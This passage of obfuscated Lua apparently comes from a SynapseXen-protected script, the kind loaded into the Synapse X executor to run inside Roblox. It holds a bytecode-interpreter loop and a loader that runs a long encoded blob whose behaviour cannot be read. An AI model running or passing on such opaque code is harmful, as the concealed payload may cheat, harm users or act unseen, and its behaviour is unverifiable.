SynapseXen_lIiiIlliIlil,SynapseXen_liIIll=SynapseXen_IIiiiiIlIlllilililI(SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli]())end;SynapseXen_illliIiii=SynapseXen_liiilIli-1;if SynapseXen_llIiIiIliI~=1 then if SynapseXen_llIiIiIliI~=0 then SynapseXen_lIiiIlliIlil=SynapseXen_liiilIli+SynapseXen_llIiIiIliI-2 else SynapseXen_lIiiIlliIlil=SynapseXen_lIiiIlliIlil+SynapseXen_liiilIli-1 end;SynapseXen_IiiliiiIIli=0;for SynapseXen_ilIiIlii=SynapseXen_liiilIli,SynapseXen_lIiiIlliIlil do SynapseXen_IiiliiiIIli=SynapseXen_IiiliiiIIli+1;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_ilIiIlii]=SynapseXen_liIIll[SynapseXen_IiiliiiIIli]end end elseif SynapseXen_iiiIIiliiiIlilIlIIi==47 then SynapseXen_IillIIIlIiliIiI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],44)]=SynapseXen_iiiIIIiIIlI[SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[2061944757],212684,262144)]elseif SynapseXen_iiiIIiliiiIlilIlIIi==156 then local SynapseXen_Iilii=SynapseXen_IillIIIlIiliIiI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[954173160],126),SynapseXen_IlIlIIIIIl)]if not not SynapseXen_Iilii==(SynapseXen_illIiillliIIIill(SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1102161443],45,512),SynapseXen_IlIlIIIIIl,512)==0)then SynapseXen_IIlII=SynapseXen_IIlII+1 else SynapseXen_IillIIIlIiliIiI[SynapseXen_IilIlIiIl(SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],80,256),SynapseXen_IlIlIIIIIl,256)]=SynapseXen_Iilii end elseif SynapseXen_iiiIIiliiiIlilIlIIi==26 then SynapseXen_IIlII=SynapseXen_IIlII+SynapseXen_iilIlIlIII[1010673982]elseif SynapseXen_iiiIIiliiiIlilIlIIi==15 then SynapseXen_illIIliil[SynapseXen_iiiIIIiIIlI[SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[2061944757],260590,262144)]]=SynapseXen_IillIIIlIiliIiI[SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],19,256)]elseif SynapseXen_iiiIIiliiiIlilIlIIi==129 then SynapseXen_IillIIIlIiliIiI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],36)]=-SynapseXen_IillIIIlIiliIiI[SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[954173160],127,512)]elseif SynapseXen_iiiIIiliiiIlilIlIIi==225 then local SynapseXen_IIlIiIlllli=SynapseXen_iIlliiillI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[2061944757],212444),SynapseXen_IlIlIIIIIl)]local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;local SynapseXen_iIIIiIiIii;local SynapseXen_liillliIlIIllIIiiIiI;if SynapseXen_IIlIiIlllli[1582391118]~=0 then SynapseXen_iIIIiIiIii={}SynapseXen_liillliIlIIllIIiiIiI=setmetatable({},{__index=function(SynapseXen_iliiIliiIIli,SynapseXen_iIIIIlIIiIIIil)local SynapseXen_ilIlIii=SynapseXen_iIIIiIiIii[SynapseXen_iIIIIlIIiIIIil]return SynapseXen_ilIlIii[1][SynapseXen_ilIlIii[2]]end,__newindex=function(SynapseXen_iliiIliiIIli,SynapseXen_iIIIIlIIiIIIil,SynapseXen_lilIIili)local SynapseXen_ilIlIii=SynapseXen_iIIIiIiIii[SynapseXen_iIIIIlIIiIIIil]SynapseXen_ilIlIii[1][SynapseXen_ilIlIii[2]]=SynapseXen_lilIIili end})for SynapseXen_ilIiIlii=1,SynapseXen_IIlIiIlllli[1582391118]do local SynapseXen_lIilIiililIl=SynapseXen_ilIIIiIIl[SynapseXen_IIlII]if SynapseXen_lIilIiililIl[544186938]==174 then SynapseXen_iIIIiIiIii[SynapseXen_ilIiIlii-1]={SynapseXen_iiIlIiIIIIiillIIIIll,SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIilIiililIl[954173160],118)}elseif SynapseXen_lIilIiililIl[544186938]==189 then SynapseXen_iIIIiIiIii[SynapseXen_ilIiIlii-1]={SynapseXen_liiiliIIIiiIlIll,SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIilIiililIl[954173160],37)}end;SynapseXen_IIlII=SynapseXen_IIlII+1 end;SynapseXen_iliillIiIiiII[#SynapseXen_iliillIiIiiII+1]=SynapseXen_iIIIiIiIii end;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_illIiillliIIIill(SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],66),SynapseXen_IlIlIIIIIl,256)]=SynapseXen_iliilIiIilIii(SynapseXen_IIlIiIlllli,SynapseXen_illIIliil,SynapseXen_liillliIlIIllIIiiIiI)elseif SynapseXen_iiiIIiliiiIlilIlIIi==82 then local SynapseXen_liiilIli=SynapseXen_illIiillliIIIill(SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],115),SynapseXen_IlIlIIIIIl,256)~=0;local SynapseXen_Iilii=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[954173160],25)local SynapseXen_llIiIiIliI=SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1102161443],73,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;if SynapseXen_Iilii>255 then SynapseXen_Iilii=SynapseXen_iiiIIIiIIlI[SynapseXen_Iilii-256]else SynapseXen_Iilii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]end;if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;if SynapseXen_Iilii==SynapseXen_llIiIiIliI~=SynapseXen_liiilIli then SynapseXen_IIlII=SynapseXen_IIlII+1 end elseif SynapseXen_iiiIIiliiiIlilIlIIi==145 then local SynapseXen_Iilii=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[954173160],124,512)local SynapseXen_llIiIiIliI=SynapseXen_illIiillliIIIill(SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1102161443],84),SynapseXen_IlIlIIIIIl,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;if SynapseXen_Iilii>255 then SynapseXen_Iilii=SynapseXen_iiiIIIiIIlI[SynapseXen_Iilii-256]else SynapseXen_Iilii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]end;if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],116,256)]=SynapseXen_Iilii-SynapseXen_llIiIiIliI elseif SynapseXen_iiiIIiliiiIlilIlIIi==215 then local SynapseXen_liiilIli=SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1055476718],30,256)~=0;local SynapseXen_Iilii=SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[954173160],66,512)local SynapseXen_llIiIiIliI=SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1102161443],5,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;if SynapseXen_Iilii>255 then SynapseXen_Iilii=SynapseXen_iiiIIIiIIlI[SynapseXen_Iilii-256]else SynapseXen_Iilii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]end;if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;if SynapseXen_Iilii<=SynapseXen_llIiIiIliI~=SynapseXen_liiilIli then SynapseXen_IIlII=SynapseXen_IIlII+1 end elseif SynapseXen_iiiIIiliiiIlilIlIIi==69 then SynapseXen_IillIIIlIiliIiI[SynapseXen_illIiillliIIIill(SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1055476718],125,256),SynapseXen_IlIlIIIIIl,256)]=#SynapseXen_IillIIIlIiliIiI[SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[954173160],100,512)]elseif SynapseXen_iiiIIiliiiIlilIlIIi==8 then local SynapseXen_liiilIli=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],75,256)local SynapseXen_llIIIllilIIlIlliill={}for SynapseXen_ilIiIlii=1,#SynapseXen_iliillIiIiiII do local SynapseXen_iiIllIIlIIIillI=SynapseXen_iliillIiIiiII[SynapseXen_ilIiIlii]for SynapseXen_iiIliiliIIIII=0,#SynapseXen_iiIllIIlIIIillI do local SynapseXen_iIiiIIilIllIIli=SynapseXen_iiIllIIlIIIillI[SynapseXen_iiIliiliIIIII]local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_iIiiIIilIllIIli[1]local SynapseXen_IiliilllIliilliiil=SynapseXen_iIiiIIilIllIIli[2]if SynapseXen_iiIlIiIIIIiillIIIIll==SynapseXen_IillIIIlIiliIiI and SynapseXen_IiliilllIliilliiil>=SynapseXen_liiilIli then SynapseXen_llIIIllilIIlIlliill[SynapseXen_IiliilllIliilliiil]=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_IiliilllIliilliiil]SynapseXen_iIiiIIilIllIIli[1]=SynapseXen_llIIIllilIIlIlliill end end end elseif SynapseXen_iiiIIiliiiIlilIlIIi==57 then local SynapseXen_liiilIli=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],96,256)local SynapseXen_Iilii=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[954173160],60)local SynapseXen_llIiIiIliI=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1102161443],56,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;SynapseXen_Iilii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+1]=SynapseXen_Iilii;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli]=SynapseXen_Iilii[SynapseXen_llIiIiIliI]elseif SynapseXen_iiiIIiliiiIlilIlIIi==67 then local SynapseXen_Iilii=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[954173160],110)local SynapseXen_llIiIiIliI=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1102161443],121,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;if SynapseXen_Iilii>255 then SynapseXen_Iilii=SynapseXen_iiiIIIiIIlI[SynapseXen_Iilii-256]else SynapseXen_Iilii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]end;if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],125,256)]=SynapseXen_Iilii^SynapseXen_llIiIiIliI elseif SynapseXen_iiiIIiliiiIlilIlIIi==232 then local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;for SynapseXen_ilIiIlii=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],119),SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[954173160],88,512)do SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_ilIiIlii]=nil end elseif SynapseXen_iiiIIiliiiIlilIlIIi==19 then SynapseXen_IillIIIlIiliIiI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],11)]=SynapseXen_illIIliil[SynapseXen_iiiIIIiIIlI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[2061944757],116537)]]elseif SynapseXen_iiiIIiliiiIlilIlIIi==240 then local SynapseXen_Iilii,SynapseXen_llIiIiIliI=SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[954173160],36),SynapseXen_IlIlIIIIIl),SynapseXen_illIiillliIIIill(SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1102161443],40,512),SynapseXen_IlIlIIIIIl,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;if SynapseXen_Iilii>255 then SynapseXen_Iilii=SynapseXen_iiiIIIiIIlI[SynapseXen_Iilii-256]else SynapseXen_Iilii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]end;if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_illIiillliIIIill(SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],52),SynapseXen_IlIlIIIIIl,256)][SynapseXen_Iilii]=SynapseXen_llIiIiIliI elseif SynapseXen_iiiIIiliiiIlilIlIIi==189 then SynapseXen_IillIIIlIiliIiI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],106)]=SynapseXen_liiiliIIIiiIlIll[SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[954173160],37)]elseif SynapseXen_iiiIIiliiiIlilIlIIi==35 then local SynapseXen_llIiIiIliI=SynapseXen_IilIlIiIl(SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1102161443],82,512),SynapseXen_IlIlIIIIIl,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_IilIlIiIl(SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],78),SynapseXen_IlIlIIIIIl,256)]=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[954173160],11,512)][SynapseXen_llIiIiIliI]elseif SynapseXen_iiiIIiliiiIlilIlIIi==107 then local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;local SynapseXen_Iilii=SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[954173160],32,512)local SynapseXen_IiIiIliliii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]for SynapseXen_ilIiIlii=SynapseXen_Iilii+1,SynapseXen_lIIiIIiIilIIIl(SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1102161443],93,512),SynapseXen_IlIlIIIIIl)do SynapseXen_IiIiIliliii=SynapseXen_IiIiIliliii..SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_ilIiIlii]end;SynapseXen_IillIIIlIiliIiI[SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1055476718],86,256)]=SynapseXen_IiIiIliliii elseif SynapseXen_iiiIIiliiiIlilIlIIi==174 then SynapseXen_IillIIIlIiliIiI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],37)]=SynapseXen_IillIIIlIiliIiI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[954173160],118)]elseif SynapseXen_iiiIIiliiiIlilIlIIi==28 then local SynapseXen_Iilii=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[954173160],25,512)local SynapseXen_llIiIiIliI=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1102161443],90,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;if SynapseXen_Iilii>255 then SynapseXen_Iilii=SynapseXen_iiiIIIiIIlI[SynapseXen_Iilii-256]else SynapseXen_Iilii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]end;if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_lIIiIIiIilIIIl(SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],106,256),SynapseXen_IlIlIIIIIl)]=SynapseXen_Iilii+SynapseXen_llIiIiIliI elseif SynapseXen_iiiIIiliiiIlilIlIIi==237 then SynapseXen_IlIlIIIIIl=SynapseXen_IillIIIlIiliIiI[SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1055476718],69,256)]elseif SynapseXen_iiiIIiliiiIlilIlIIi==9 then SynapseXen_IillIIIlIiliIiI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],102,256),SynapseXen_IlIlIIIIIl)]=not SynapseXen_IillIIIlIiliIiI[SynapseXen_IilIlIiIl(SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[954173160],75,512),SynapseXen_IlIlIIIIIl,512)]elseif SynapseXen_iiiIIiliiiIlilIlIIi==60 then SynapseXen_IillIIIlIiliIiI[SynapseXen_illIiillliIIIill(SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1055476718],70,256),SynapseXen_IlIlIIIIIl,256)]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[954173160],71)~=0;if SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1102161443],34,512)~=0 then SynapseXen_IIlII=SynapseXen_IIlII+1 end end end end;local SynapseXen_IlIllIiliIIi={...}for SynapseXen_ilIiIlii=0,SynapseXen_IIlliiIili do if SynapseXen_ilIiIlii>=SynapseXen_iiIiIII[970458831]then SynapseXen_lllIlliiIlIIiIlill[SynapseXen_ilIiIlii-SynapseXen_iiIiIII[970458831]]=SynapseXen_IlIllIiliIIi[SynapseXen_ilIiIlii+1]else SynapseXen_IillIIIlIiliIiI[SynapseXen_ilIiIlii]=SynapseXen_IlIllIiliIIi[SynapseXen_ilIiIlii+1]end end;local SynapseXen_Iilii,SynapseXen_llIiIiIliI=SynapseXen_IiiiIiIllIllIIlllIl()if SynapseXen_Iilii and SynapseXen_llIiIiIliI>0 then return unpack(SynapseXen_Iilii,1,SynapseXen_llIiIiIliI)end;return end end;local function SynapseXen_lIlllIlII(SynapseXen_IilillilII,SynapseXen_illIIliil)local SynapseXen_lIilIliiI=SynapseXen_iiilIliilll(SynapseXen_IilillilII)return SynapseXen_iliilIiIilIii(SynapseXen_lIilIliiI,SynapseXen_illIIliil or getfenv(0)),SynapseXen_lIilIliiI end;return SynapseXen_lIlllIlII(SynapseXen_iIlllI("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